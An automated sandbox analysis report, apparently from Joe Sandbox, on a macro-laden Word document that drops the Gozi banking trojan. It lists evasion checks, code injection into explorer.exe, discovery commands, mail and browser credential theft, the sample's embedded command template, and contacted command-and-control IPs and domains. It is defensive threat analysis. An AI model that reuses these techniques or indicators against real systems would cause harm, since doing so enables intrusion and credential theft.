Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapter
Found evasive API chain (date check)Show sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\text.doc.16147.scrCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-2279
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeAPI coverage: 6.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\text.doc.16147.scr TID: 1660Thread sleep count: 68 > 30Jump to behavior
Source: C:\Users\user\text.doc.16147.scr TID: 2728Thread sleep count: 67 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 1916Thread sleep time: -10560000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 1916Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\systeminfo.exe TID: 624Thread sleep time: -780000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3836Thread sleep count: 70 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3252Thread sleep count: 67 > 30Jump to behavior
Source: C:\Windows\System32\tasklist.exe TID: 2636Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\tasklist.exe TID: 2636Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\driverquery.exe TID: 2116Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\driverquery.exe TID: 2116Thread sleep time: -60000s >= -30000sJump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree,3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,16_2_00391663
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000005.00000000.1115390919.03B66000.00000004.sdmpBinary or memory string: vmbusres.dllPO
Program exit pointsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Users\user\text.doc.16147.scrProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_aecaider_3fc0094e727c3194.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\systeminfo.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00390600 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,16_2_00390600
Enables debug privilegesShow sources
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037DCD8 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,16_2_0037DCD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038AB35 RtlExitUserThread,RtlAddVectoredExceptionHandler,OpenEventA,FreeLibrary,HeapFree,16_2_0038AB35

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\explorer.exeNetwork Connect: 37.152.176.90 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 178.169.196.83 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 46.139.176.151 80Jump to behavior
Allocates memory in foreign processesShow sources
Source: C:\Users\user\text.doc.16147.scrMemory allocated: C:\Windows\explorer.exe base: 1D70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\explorer.exeMemory allocated: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000 protect: page execute and read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute readJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute readJump to behavior
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Users\user\text.doc.16147.scrThread created: C:\Windows\explorer.exe EIP: 76FDF515Jump to behavior
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Users\user\text.doc.16147.scrMemory written: PID: 3000 base: 76FDF515 value: EBJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: PID: 3000 base: 1D70000 value: 15Jump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: PID: 3000 base: 76FDF515 value: 8BJump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\text.doc.16147.scrSection loaded: unknown target pid: 3000 protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\text.doc.16147.scrThread register set: target process: 3000Jump to behavior
Source: C:\Windows\explorer.exeThread register set: target process: 3824Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\text.doc.16147.scrMemory written: C:\Windows\explorer.exe base: 76FDF515Jump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: C:\Windows\explorer.exe base: 1D70000Jump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: C:\Windows\explorer.exe base: 76FDF515Jump to behavior
Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5Jump to behavior
Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000Jump to behavior
Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo.exe Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\driverquery.exe driverquery.exe Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmpBinary or memory string: ProgMan
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmpBinary or memory string: 64RtlSetUnhandledExceptionFilterSystemRoot%08X-%04X-%04X-%04X-%08X%04X{%08X-%04X-%04X-%04X-%08X%04X}ADVAPI32.DLL*.*LdrGetProcedureAddressRtlExitUserThreadCreateRemoteThreadZwWriteVirtualMemoryLdrLoadDllZwProtectVirtualMemorykernelbaseLdrRegisterDllNotificationLdrUnregisterDllNotification\.exe%TEMP%\LowCreateProcessACreateProcessWCreateProcessAsUserACreateProcessAsUserW"%S" "%S"version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%srunascmd.exeLow\DllRegisterServer/C "copy "%s" "%s" /y && rundll32 "%s",%S"/C "copy "%s" "%s" /y && "%s" "%s""ProgManMicrosoft
Source: explorer.exe, 00000005.00000000.1099934971.000ED000.00000004.sdmpBinary or memory string: Progmanp

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038F3B0 cpuid 16_2_0038F3B0
Contains functionality to create pipes for IPCShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037C19E CreateNamedPipeA,CreateThread,GetLastError,CloseHandle,GetLastError,16_2_0037C19E
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01414A4D GetCurrentThreadId,GetSystemTimeAsFileTime,GetTempFileNameA,PathFindExtensionA,lstrcpy,3_2_01414A4D
Contains functionality to query windows versionShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_014129A4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_014129A4
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\systeminfo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settingsShow sources
Source: C:\Windows\explorer.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific filesShow sources
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account<.oeaccountJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account{*}.oeaccountJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknownJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 820806 Sample: e41ZuYVo64.docm Startdate: 20/03/2019 Architecture: WINDOWS Score: 100 81 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->81 83 Document exploit detected (drops PE files) 2->83 85 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->85 87 13 other signatures 2->87 9 WINWORD.EXE 316 44 2->9         started        process3 dnsIp4 69 31.148.219.163, 49204, 80 unknown Czech Republic 9->69 49 C:\Users\user\text.doc.16147.scr, PE32 9->49 dropped 105 Document exploit detected (process start blacklist hit) 9->105 14 text.doc.16147.scr 3 9->14         started        file5 signatures6 process7 file8 51 C:\Users\user\AppData\...\avicbrkr.exe, data 14->51 dropped 107 Found stalling execution ending in API Sleep call 14->107 109 Changes memory attributes in foreign processes to executable or writable 14->109 111 Injects code into the Windows Explorer (explorer.exe) 14->111 113 6 other signatures 14->113 18 explorer.exe 11 12 14->18 injected signatures9 process10 dnsIp11 53 46.139.176.151, 49207, 80 HTC-ASMagyarTelekomNyrtHU Hungary 18->53 55 interruption.ru 178.169.196.83, 49205, 80 unknown Romania 18->55 57 2 other IPs or domains 18->57 47 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 18->47 dropped 89 System process connects to network (likely due to code injection or exploit) 18->89 91 Tries to steal Mail credentials (via file access) 18->91 93 Overwrites Mozilla Firefox settings 18->93 95 5 other signatures 18->95 23 cmd.exe 1 18->23         started        25 cmd.exe 18->25         started        29 avicbrkr.exe 18->29         started        31 9 other processes 18->31 file12 signatures13 process14 dnsIp15 33 systeminfo.exe 2 23->33         started        71 127.0.0.1 unknown unknown 25->71 97 Uses nslookup.exe to query domains 25->97 36 nslookup.exe 25->36         started        99 Detected Gozi e-Banking trojan 29->99 101 Found stalling execution ending in API Sleep call 29->101 103 Performs a network lookup / discovery via net view 31->103 39 driverquery.exe 31->39         started        41 nslookup.exe 31->41         started        43 tasklist.exe 31->43         started        45 net.exe 31->45         started        signatures16 process17 dnsIp18 73 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->73 75 Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines) 33->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 33->77 59 8.8.8.8.in-addr.arpa 36->59 61 1.0.0.127.in-addr.arpa 36->61 79 Writes or reads registry keys via WMI 39->79 63 222.222.67.208.in-addr.arpa 41->63 65 resolver1.opendns.com 41->65